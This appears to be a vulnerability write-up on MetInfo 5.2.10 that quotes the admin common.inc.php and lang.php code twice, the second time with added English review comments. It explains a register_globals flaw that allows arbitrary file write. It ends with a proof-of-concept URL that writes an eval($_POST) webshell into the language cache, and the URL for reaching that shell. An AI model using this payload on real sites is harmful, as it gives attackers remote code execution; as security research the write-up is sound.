<ul><li>/admin/include/common.inc.php</li></ul><pre class="">if(!is_array($met_langadmin[$_GET[langset]])&&$_GET[langset]!='')die('not have this language'); if($_GET[langset]!=''){ $_GET[langset]=daddslashes($_GET[langset],0,1); change_met_cookie('languser',$_GET[langset]); save_met_cookie(); } $_M['user']['cookie'] = $met_cookie; $metinfo_admin_name = get_met_cookie('metinfo_admin_name'); $metinfo_admin_pass = get_met_cookie('metinfo_admin_pass'); $metinfo_admin_pop = get_met_cookie('metinfo_admin_pop'); $metinfo_admin_shortcut = get_met_cookie('metinfo_admin_shortcut'); $languser = get_met_cookie('languser'); $langadminok = get_met_cookie('metinfo_admin_lang'); $langusenow=$languser; if($langadminok<>"" and $langadminok<>'metinfo')$adminlang=explode('-',$langadminok); require_once ROOTPATH_ADMIN.'include/lang.php'; </pre><p>包含lang.php</p><ul><li>/admin/include/lang.php</li></ul><pre class="">if(!file_get_contents(ROOTPATH.'cache/langadmin_'.$langset.'.php')){...
<ul><li>/admin/include/common.inc.php</li></ul><pre class="">/* Admin-area language selection: validates the requested langset against $met_langadmin, stores it in a cookie, then loads the admin cookies and includes lang.php. $met_langadmin and $met_cookie are expected to be defined earlier in common.inc.php (not visible here). NOTE: langset is written as an unquoted constant, which PHP falls back to the string 'langset'; is_array() on the matching entry (plus the non-empty check) is the only validation applied to the requested key. */ if(!is_array($met_langadmin[$_GET[langset]])&&$_GET[langset]!='')die('not have this language'); if($_GET[langset]!=''){ /* daddslashes() is a project helper (not visible here); presumably it escapes the value before it is persisted in the 'languser' cookie -- confirm. */ $_GET[langset]=daddslashes($_GET[langset],0,1); change_met_cookie('languser',$_GET[langset]); save_met_cookie(); } $_M['user']['cookie'] = $met_cookie; $metinfo_admin_name = get_met_cookie('metinfo_admin_name'); $metinfo_admin_pass = get_met_cookie('metinfo_admin_pass'); $metinfo_admin_pop = get_met_cookie('metinfo_admin_pop'); $metinfo_admin_shortcut = get_met_cookie('metinfo_admin_shortcut'); $languser = get_met_cookie('languser'); $langadminok = get_met_cookie('metinfo_admin_lang'); $langusenow=$languser; /* <> is the loose != operator; the admin-language cookie is split on '-' only when it is neither empty nor 'metinfo'. */ if($langadminok<>"" and $langadminok<>'metinfo')$adminlang=explode('-',$langadminok); /* lang.php (quoted below) builds the admin language cache file. */ require_once ROOTPATH_ADMIN.'include/lang.php'; </pre><p>包含lang.php</p><ul><li>/admin/include/lang.php</li></ul><pre class="">/* Regenerates cache/langadmin_$langset.php from the language table whenever file_get_contents() on the cache file yields false or an empty string. $langset, $db, $met_language and $metcms_v are not assigned in this fragment -- common.inc.php above only reads $_GET[langset], so where the plain $langset is assigned should be confirmed. The closing brace of this if block is not shown on the page. */ if(!file_get_contents(ROOTPATH.'cache/langadmin_'.$langset.'.php')){ $js="var user_msg = new Array();\n"; /* NOTE(review): $langset is interpolated straight into the SQL text rather than bound as a parameter (same again after syn_lang() below). */ $query="select * from $met_language where lang='$langset' and site='1' and array!='0'"; $result= $db->query($query); /* When the query reports no rows: import the language .ini via the project's syn_lang() helper (not visible here), then re-run the same query. */ if($db->affected_rows()==0){ require_once ROOTPATH_ADMIN.'system/lang/lang.func.php'; $post=array('newlangmark'=>$langset,'metcms_v'=>$metcms_v,'newlangtype'=>'admin'); $file_basicname=ROOTPATH_ADMIN.'update/lang/lang_'.$langset.'.ini'; $re=syn_lang($post,$file_basicname,$langset,1,0); $query="select * from $met_language where lang='$langset' and site='1' and array!='0'"; $result= $db->query($query); } /* Each row becomes a local variable $lang_{name} (variable-variable, name taken from the DB row) and one assignment line in the generated PHP file. Rows whose name starts with 'js' are also emitted into a JS array; note $tmp is placed inside a single-quoted JS string without escaping. */ while($listlang= $db->fetch_array($result)){ if(substr($listlang['name'],0,2)=='js'){ $tmp=trim($listlang['value']); $js=$js."user_msg['{$listlang['name']}']='$tmp';\n"; } $name = 'lang_'.$listlang['name']; $$name= trim($listlang['value']); /* Backslashes and single quotes in the value are escaped for the generated code. NOTE(review): $str is only ever appended to with .= and is never initialized in this fragment, so whatever value it already holds becomes the head of the generated file; initializing it (e.g. $str=''; before the loop) would remove that dependency. */ $str.='$'."{$name}='".str_replace(array('\\',"'"),array("\\\\","\\'"),trim($listlang['value']))."';"; } $js1='$'."js='".str_replace("'","\\'",$js).'\';'; /* Wrap the accumulated assignments as a PHP file; it is written to the cache path on the following line. */ $str="<?php\n".$str.$js1."\n?>"; 
file_put_contents(ROOTPATH.'cache/langadmin_'.$langset.'.php',$str); <br></pre><p>当缓存文件不存在时,会写入一个php文件。<br></p><p>当PHP开启了register_globals时,请求参数会直接成为全局变量:$met_langadmin 可被构造成数组以通过 is_array 检查,而 $str 在拼接前未被初始化,其初始值可由请求提供并原样写入缓存文件,导致任意写入文件,以至于getshell。</p><p>访问地址:</p><pre class="">http://10.211.55.4/metinfo5.2.10//admin/include/common.inc.php?met_admin_type_ok=2&langset=aaaa&met_langadmin[aaaa][]=12345&str=eval($_POST[e]);%3F%3E//</pre><p>访问shell:</p><pre class="">http://10.211.55.4/MetInfo5.2.10/cache/langadmin_aaaa.php</pre><p> </p><p><img alt="D4474688-9C8E-4929-81C9-40CE2684EF83.png" src="https://images.seebug.org/@/uploads/1433921939736-D4474688-9C8E-4929-81C9-40CE2684EF83.png" data-image-size="1798,956"><br></p>